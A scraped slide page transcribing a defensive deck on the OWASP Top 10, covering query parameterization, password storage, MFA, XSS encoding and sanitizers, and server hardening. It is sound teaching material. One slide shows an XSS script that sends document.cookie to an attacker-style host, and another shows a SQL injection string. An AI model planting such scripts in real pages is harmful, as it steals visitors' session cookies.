Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure Coding
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack Vectors
 
Password (in)security
Password (in)securityPassword (in)security
Password (in)security
 
Webinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControlWebinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControl
 
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...
 
Web Security Horror Stories
Web Security Horror StoriesWeb Security Horror Stories
Web Security Horror Stories
 
BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural net
 
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
HTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionHTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC Edition
 
Password Security
Password SecurityPassword Security
Password Security
 
Dynamic Database Credentials: Security Contingency Planning
Dynamic Database Credentials: Security Contingency PlanningDynamic Database Credentials: Security Contingency Planning
Dynamic Database Credentials: Security Contingency Planning
 
JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJS
 

Andere mochten auch

Web security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsWeb security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsFabio Lombardi
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practicesAmit Kejriwal
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
2008: Web Application Security Tutorial
2008: Web Application Security Tutorial2008: Web Application Security Tutorial
2008: Web Application Security TutorialNeil Matatall
 
Tutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the WebTutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the Webdpd
 
DemoDay Berlin Partners
DemoDay Berlin PartnersDemoDay Berlin Partners
DemoDay Berlin PartnersFabio Lombardi
 
End to end web security
End to end web securityEnd to end web security
End to end web securityGeorge Boobyer
 
Dependency injection in PHP 5.3/5.4
Dependency injection in PHP 5.3/5.4Dependency injection in PHP 5.3/5.4
Dependency injection in PHP 5.3/5.4Fabien Potencier
 
Cisco Web and Email Security Overview
Cisco Web and Email Security OverviewCisco Web and Email Security Overview
Cisco Web and Email Security OverviewCisco Security
 

Andere mochten auch (10)

Web security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsWeb security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutions
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practices
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
2008: Web Application Security Tutorial
2008: Web Application Security Tutorial2008: Web Application Security Tutorial
2008: Web Application Security Tutorial
 
Tutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the WebTutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the Web
 
DemoDay Berlin Partners
DemoDay Berlin PartnersDemoDay Berlin Partners
DemoDay Berlin Partners
 
End to end web security
End to end web securityEnd to end web security
End to end web security
 
Dependency injection in PHP 5.3/5.4
Dependency injection in PHP 5.3/5.4Dependency injection in PHP 5.3/5.4
Dependency injection in PHP 5.3/5.4
 
Cisco Web and Email Security Overview
Cisco Web and Email Security OverviewCisco Web and Email Security Overview
Cisco Web and Email Security Overview
 
Web Security
Web SecurityWeb Security
Web Security
 

Ähnlich wie Application Security around OWASP Top 10

Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Jim Manico
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Jim Manico
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Security 202 - Are you sure your site is secure?
Security 202 - Are you sure your site is secure?Security 202 - Are you sure your site is secure?
Security 202 - Are you sure your site is secure?ConFoo
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...appsec
 
Web Application Security in Rails
Web Application Security in RailsWeb Application Security in Rails
Web Application Security in RailsUri Nativ
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxFernandoVizer
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And AnishOSSCube
 
OWASP San Diego Training Presentation
OWASP San Diego Training PresentationOWASP San Diego Training Presentation
OWASP San Diego Training Presentationowaspsd
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptx
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptxTrack 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptx
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptxAmazon Web Services
 
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全Amazon Web Services
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSlawomir Jasek
 

Ähnlich wie Application Security around OWASP Top 10 (20)

Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Security 202 - Are you sure your site is secure?
Security 202 - Are you sure your site is secure?Security 202 - Are you sure your site is secure?
Security 202 - Are you sure your site is secure?
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Security in Node.JS and Express:
Security in Node.JS and Express:Security in Node.JS and Express:
Security in Node.JS and Express:
 
07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...
 
Web Application Security in Rails
Web Application Security in RailsWeb Application Security in Rails
Web Application Security in Rails
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And Anish
 
OWASP San Diego Training Presentation
OWASP San Diego Training PresentationOWASP San Diego Training Presentation
OWASP San Diego Training Presentation
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
 
Complete xss walkthrough
Complete xss walkthroughComplete xss walkthrough
Complete xss walkthrough
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptx
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptxTrack 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptx
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptx
 
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 

Kürzlich hochgeladen

Sending Calendar Invites on SES and Calendarsnack.pdf
Sending Calendar Invites on SES and Calendarsnack.pdfSending Calendar Invites on SES and Calendarsnack.pdf
Sending Calendar Invites on SES and Calendarsnack.pdf31events.com
 
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company OdishaBalasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odishasmiwainfosol
 
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)jennyeacort
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Natan Silnitsky
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Velvetech LLC
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based projectAnoyGreter
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...OnePlan Solutions
 
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanyChristoph Pohl
 
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxUI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxAndreas Kunz
 
Understanding Flamingo - DeepMind's VLM Architecture
Understanding Flamingo - DeepMind's VLM ArchitectureUnderstanding Flamingo - DeepMind's VLM Architecture
Understanding Flamingo - DeepMind's VLM Architecturerahul_net
 
A healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfA healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfMarharyta Nedzelska
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024StefanoLambiase
 
CRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. SalesforceCRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. SalesforceBrainSell Technologies
 
Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsAhmed Mohamed
 
How to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion ApplicationHow to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion ApplicationBradBedford3
 
What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...Technogeeks
 
Salesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZSalesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZABSYZ Inc
 

Kürzlich hochgeladen (20)

Sending Calendar Invites on SES and Calendarsnack.pdf
Sending Calendar Invites on SES and Calendarsnack.pdfSending Calendar Invites on SES and Calendarsnack.pdf
Sending Calendar Invites on SES and Calendarsnack.pdf
 
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company OdishaBalasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
 
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based project
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
 
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
 
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxUI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
 
Understanding Flamingo - DeepMind's VLM Architecture
Understanding Flamingo - DeepMind's VLM ArchitectureUnderstanding Flamingo - DeepMind's VLM Architecture
Understanding Flamingo - DeepMind's VLM Architecture
 
A healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfA healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdf
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
 
Advantages of Odoo ERP 17 for Your Business
Advantages of Odoo ERP 17 for Your BusinessAdvantages of Odoo ERP 17 for Your Business
Advantages of Odoo ERP 17 for Your Business
 
CRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. SalesforceCRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. Salesforce
 
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort ServiceHot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
 
Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML Diagrams
 
2.pdf Ejercicios de programación competitiva
2.pdf Ejercicios de programación competitiva2.pdf Ejercicios de programación competitiva
2.pdf Ejercicios de programación competitiva
 
How to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion ApplicationHow to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion Application
 
What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...
 
Salesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZSalesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZ
 

Application Security around OWASP Top 10

  • 1. 1 Many thanks (content & inspiration) to: Jim Manico, Eoin Keary & Troy Hunt
  • 2. WARNING This is an awareness document. There are more than 10 issues. You cannot secure an application based on a top ten list.
  • 3. OWASP Top 10 - 2013
  • 5. $NEW_EMAIL = Request['new_email']; update users set email='$NEW_EMAIL' where id=132005; SQL Injection
  • 6. 1. WHAT IF: $NEW_EMAIL = '; 2. update users set email='$NEW_EMAIL' where id=132005; 3. update users set email='';--' where id=132005; SQL Injection
  • 7. $stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); $stmt->bindParam(':new_email', $email); $stmt->bindParam(':user_id', $id); Query Parameterization (PHP PDO)
  • 8. SqlConnection objConnection = new SqlConnection(_ConnectionString); objConnection.Open(); SqlCommand objCommand = new SqlCommand( "SELECT * FROM User WHERE Name = @Name AND Password = @Password", objConnection); objCommand.Parameters.Add("@Name", NameTextBox.Text); objCommand.Parameters.Add("@Password", PassTextBox.Text); SqlDataReader objReader = objCommand.ExecuteReader(); Query Parameterization (.NET)
  • 9. String newName = request.getParameter("newName"); String id = request.getParameter("id"); //SQL PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id); //HQL Query safeHQLQuery = session.createQuery("from Employees where id=:empId"); safeHQLQuery.setParameter("empId", id); Query Parameterization (Java)
  • 10. # Create Project.create!(:name => 'owasp') # Read Project.all(:conditions => "name = ?", name) Project.all(:conditions => { :name => name }) Project.where("name = :name", :name => name) Project.where(:id=> params[:id]).all # Update Project.update_attributes(:name => 'owasp') Query Parameterization Failure (RoR)
  • 11. OWASP Top 10 - 2013
  • 12. Disable Browser Autocomplete <form AUTOCOMPLETE="off"> <input AUTOCOMPLETE="off"> Only send passwords over HTTPS POST Do not display passwords in browser Input type=password Store password based on need Use a salt (de-duplication) SCRYPT/PBKDF2 (slow, performance hit, easy) HMAC (requires good key storage, tough) [2][2]Password Defenses
  • 13. 1) Do not limit the type of characters or length* of user password •) Limiting passwords to protect against injection is doomed to failure •) Use proper encoder and other defenses described instead Password Storage
  • 14. 2) Use a Cryptographically strong credential-specific salt •) Protect ([salt] + [password]); •) Use a 32 char / 64 char salt (may depend on protection function) •) Do not depend on hiding / splitting / otherwise obscuring the salt Password Storage
  • 15. 3) Impose difficult verification on attacker ONLY •) HMAC-SHA256 ([private key], [salt] + [password]) •) Protect the key as any private key •) Store key outside the credential store ( •) Improvement over (solely) salted schemes; relies on proper key creation & management Password Storage
  • 16. 4) Impose difficult verification on both (impacts attacker more than defender) •) pbkdf2([salt] + [password], c=10,000,000); •) PBKDF2 when FIPS certification or enterprise support on many platforms required •) Scrypt when resisting hardware accelerated attacks is more important Password Storage
  • 17. Basic MFA Considerations 17 • Where do you send the token? – Email (worst – yet, better than none!) – SMS (ok) – Mobile native app (good) – Dedicated token (great) – Printed Tokens (interesting) • How do you handle thick clients? – Email services, for example – Dedicated and strong per-app passwords
  • 18. Basic MFA Considerations 18 • How do you handle unavailable MFA devices? – Printed back-up codes – Fallback mechanism (like email) – Call-in center • How do you handle mobile apps? – When is MFA not useful in mobile app scenarios?
  • 19. “Forgot Password” design Require identity questions Last name, account number, email, DOB Enforce lockout policy Ask one or more good security questions https://www.owasp.org/index.php/Choosing_and_Using_Security_Ques tions_Cheat_Sheet Send the user a randomly generated token via out-of-band email, SMS or hardware / software token generator Verify code in same web session Enforce lockout policy Change password Enforce password policy
  • 20. OWASP Top 10 - 2013
  • 22. <script > var badURL = ‘https://evileviljim.com/somesite/data=‘ + document.cookie; var img = new Image(); img.src = badURL; </script> <script>document.body.innerHTML=‘<blink>CYBER IS COOL</blink>’;</script> Anatomy of an XSS Attack
  • 23. Impact of XSS – Session Hijacking – Site Defacement – Network Scanning – Undermining CSRF Defenses – Site Redirection/Phishing – Load of Remotely Hosted Scripts – Data Theft – Keystroke Logging – Attackers using XSS more frequently
  • 24. XSS Prevention (.NET) • WebForms/WebForms View Engine <%=Server.HtmlEncode(data)%> • WebForms v4.0+ <%data%> • MVC3+ Razor View Engine @data • Data Binding in Web Forms v4 and below <%#Server.HtmlEncode(Eval(“property”))%> • Data Binding in v4.5 <%#Item.Property%> • Better: ASP.Net 3.5 and below use AntiXss library directly Microsoft.Security.Application.Encoder.HtmlEncode(message)
  • 25. XSS Prevention (.NET) • ASP.Net 4 (WebForms and MVC) <httpRuntime encoderType= “Microsoft.Security.Application.AntiXssEncoder,AntiXssLibr ary”/> • ASP.Net 4.5 (AntiXss included in this version!) <httpRuntime encoderType=”System.WebSecurity.AntiXssEncoder, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a”/> • JSON(MVC) Json.Encode(Model) • Javascript encoding using AntiXss Encoder.JavaScriptEncode(Model.FirstName)
  • 26. <
  • 27. &lt;
  • 28. • No third party libraries or configuration necessary • This code was designed for high-availability/high- performance encoding functionality • Simple drop-in encoding functionality • Performance, ESAPI integration • More complete API (uri and uri component encoding, etc) in some regards • Java 1.5+ • Last updated January 30, 2014 (version 1.1.1) https://www.owasp.org/index.php/OWASP_Java_Encoder_Project OWASP Java Encoder Project
  • 29. Web Page built in Java JSP is vulnerable to XSSWeb Page built in Java JSP is vulnerable to XSS OWASP Java Encoder Project Problem Solution 1) <input type="text" name="data" value="<%= Encode.forHtmlAttribute(dataValue) %>" /> 2) <textarea name="text"><%= Encode.forHtmlContent(textValue) %>" /> 3) <button onclick="alert('<%= Encode.forJavaScriptAttribute(alertMsg) %>');"> click me </button> 4) <script type="text/javascript"> var msg = "<%= Encode.forJavaScriptBlock(message) %>"; alert(msg); </script>
  • 30. HTML Contexts Encode#forHtmlContent(String) Encode#forHtmlAttribute(String) Encode#forHtmlUnquotedAttribute (String) XML Contexts Encode#forXml(String) Encode#forXmlContent(String) Encode#forXmlAttribute(String) Encode#forXmlComment(String) Encode#forCDATA(String) CSS Contexts Encode#forCssString(String) Encode#forCssUrl(String) JavaScript Contexts Encode#forJavaScript(String) Encode#forJavaScriptAttribute(String) Encode#forJavaScriptBlock(String) Encode#forJavaScriptSource(String) URI/URL contexts Encode#forUri(String) Encode#forUriComponent(String) OWASP Java Encoder Project
  • 31. <script src="/my-server-side-generated-script"> class MyServerSideGeneratedScript extends HttpServlet { void doGet(blah) { response.setContentType("text/javascript; charset=UTF-8"); PrintWriter w = response.getWriter(); w.println("function() {"); w.println(" alert('" + Encode.forJavaScriptSource(theTextToAlert) + "');"); w.println("}"); } } <script src="/my-server-side-generated-script"> class MyServerSideGeneratedScript extends HttpServlet { void doGet(blah) { response.setContentType("text/javascript; charset=UTF-8"); PrintWriter w = response.getWriter(); w.println("function() {"); w.println(" alert('" + Encode.forJavaScriptSource(theTextToAlert) + "');"); w.println("}"); } } OWASP Java Encoder Project
  • 32. Other Encoding Libraries • Ruby on Rails – http://api.rubyonrails.org/classes/ERB/Util.html • Reform Project – Java, .NET v1/v2, PHP, Python, Perl, JavaScript, Classic ASP – https://www.owasp.org/index.php/Category:OWASP_Encodin g_Project • ESAPI – PHP.NET, Python, Classic ASP, Cold Fusion – https://www.owasp.org/index.php/Category:OWASP_Enterpri se_Security_API • .NET AntiXSS Library – http://wpl.codeplex.com/releases/view/80289
  • 33. • Writte in Java; lets you include HTML authored by third-parties in your web application while protecting against XSS • Has an extensive test suite, and has undergone adversarial security review https://code.google.com/p/owasp-java-html-sanitizer/wiki/At tackReviewGroundRules • Very easy to use • Allows for simple programmatic POSITIVE policy configuration. No XML config. • << Caja project (Google) High performance & low memory utilization OWASP HTML Sanitizer Project https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
  • 34. Web Page is vulnerable to XSS because of untrusted HTMLWeb Page is vulnerable to XSS because of untrusted HTML PolicyFactory policy = new HtmlPolicyBuilder() .allowElements("a") .allowUrlProtocols("https") .allowAttributes("href").onElements("a") .requireRelNofollowOnLinks() .build(); String safeHTML = policy.sanitize(untrustedHTML); PolicyFactory policy = new HtmlPolicyBuilder() .allowElements("a") .allowUrlProtocols("https") .allowAttributes("href").onElements("a") .requireRelNofollowOnLinks() .build(); String safeHTML = policy.sanitize(untrustedHTML); Solving real world problems (using OWASP HTML Sanitizer) Problem Solution
  • 35. • Pure JavaScript – http://code.google.com/p/google-caja/wiki/JsHtmlSanitizer • Python – https://pypi.python.org/pypi/bleach • PHP – http://htmlpurifier.org/ – http://www.bioinformatics.org/phplabware/internal_utilities/htm Lawed/ • .NET – AntiXSS.getSafeHTML/getSafeHTMLFragment – http://htmlagilitypack.codeplex.com/ • Ruby on Rails – http://api.rubyonrails.org/classes/HTML.html Other HTML Sanitizers
  • 36. • JavaScript encode and delimit untrusted data as quoted strings • Avoid use of HTML rendering methods like innerHTML – If you must do this, then sanitize untrusted HTML first • Avoid code execution contexts – eval(), setTimeout() or event handlers • When possible, treat untrusted data as display text only • To build dynamic interfaces, use document.createElement("…"), element.setAttribute("…","value"), element.appendChild(…) • Parse JSON with JSON.parse in the browser DOM-based XSS Defense
  • 37.  SAFE use of JQuery  $(‘#element’).text(UNTRUSTED DATA);  UNSAFE use of JQuery  $(‘#element’).html(UNTRUSTED DATA);
  • 38. OWASP Top 10 - 2013
  • 40. 40 Using fiddler an attacker can change the id and access more information Insecure Direct Object Reference
  • 41. 41 We need to change the method signature (the ID is now a GUID), then translate it back to the original, direct reference before going any further: public Customer GetCustomer(Guid indirectId) { var customerId = IndirectReferenceMap.GetDirectReference(indirectId); } Insecure Direct Object Reference
  • 42. OWASP Top 10 - 2013
  • 43. [5][5]Security Misconfiguration Is it really the developers' work? Or the sysadmins? If the developers don't know, how will the application security design be complete? What about configuring in Dev & Testing environments?
  • 44. • Harden the Operating System – BIOS & grub passwords; secure physical access – Use multiple partitions (not default install); use options like ro, nosuid,noexec,nodev --make-runbindable ... – Remove all unnecessary packages & drivers (e.g., do you really need Xorg? All those fonts?) – Lockdown others (cron, USB detect, IPv6, ctrl-alt-del, – SSH password-less login with SSH keygen – Enable ufw / iptables / … and a HIDS >> turn on remote logging – Oh yeah, regular patches & updates (wait!) – Regular backups! Hardening the servers (general)
  • 45. • Run Tomcat under a Security Manager – http://tomcat.apache.org/tomcat-6.0-doc/security-manage r-howto.html – Modify $CATALINA_BASE/conf/catalina.policy PropertyPermission, RuntimePermission, FilePermission, SocketPermission, NetPermission, ReflectPermission, … – Configure package access (careful! test & debug!) $CATALINA_BASE/conf/catalina.properties – Restart Tomcat $CATALINA_HOME/bin/catalina.sh start -security (Unix) %CATALINA_HOME%bincatalina start -security (Windows) Secure Config Tips (Tomcat)
  • 46. • More tips – http://www.tomcatexpert.com/blog/2011/11/02/best- practices-securing-apache-tomcat-7 – Use Security LifeCycle Listener – Lockdown connector interfaces – Disable shutdown port? – Secure your Web Manager – Configure AccessLogValve and RemoteAddrValve Secure Config Tips (Tomcat)
  • 47. • Similar principles as Tomcat – Use the Java Security Manager – Configure policies and access permissions – Use Security Realms – Disable remote access to JMX – Configure TLS (SSL?) carefully remove old protos, weak crypto, renego, legacy support, etc. – Secure the Management interfaces (disable HTTP mgmt?) – ... Secure Config Tips (JBOSS)
  • 48. 5 things to remember here : • Error Handling (Enable Custom Errors) • Disable TRACE Securing web.config
  • 49. • Disable Debugging • HTTP Only cookies Securing web.config
  • 50. • Session State- UseCookies Securing web.config
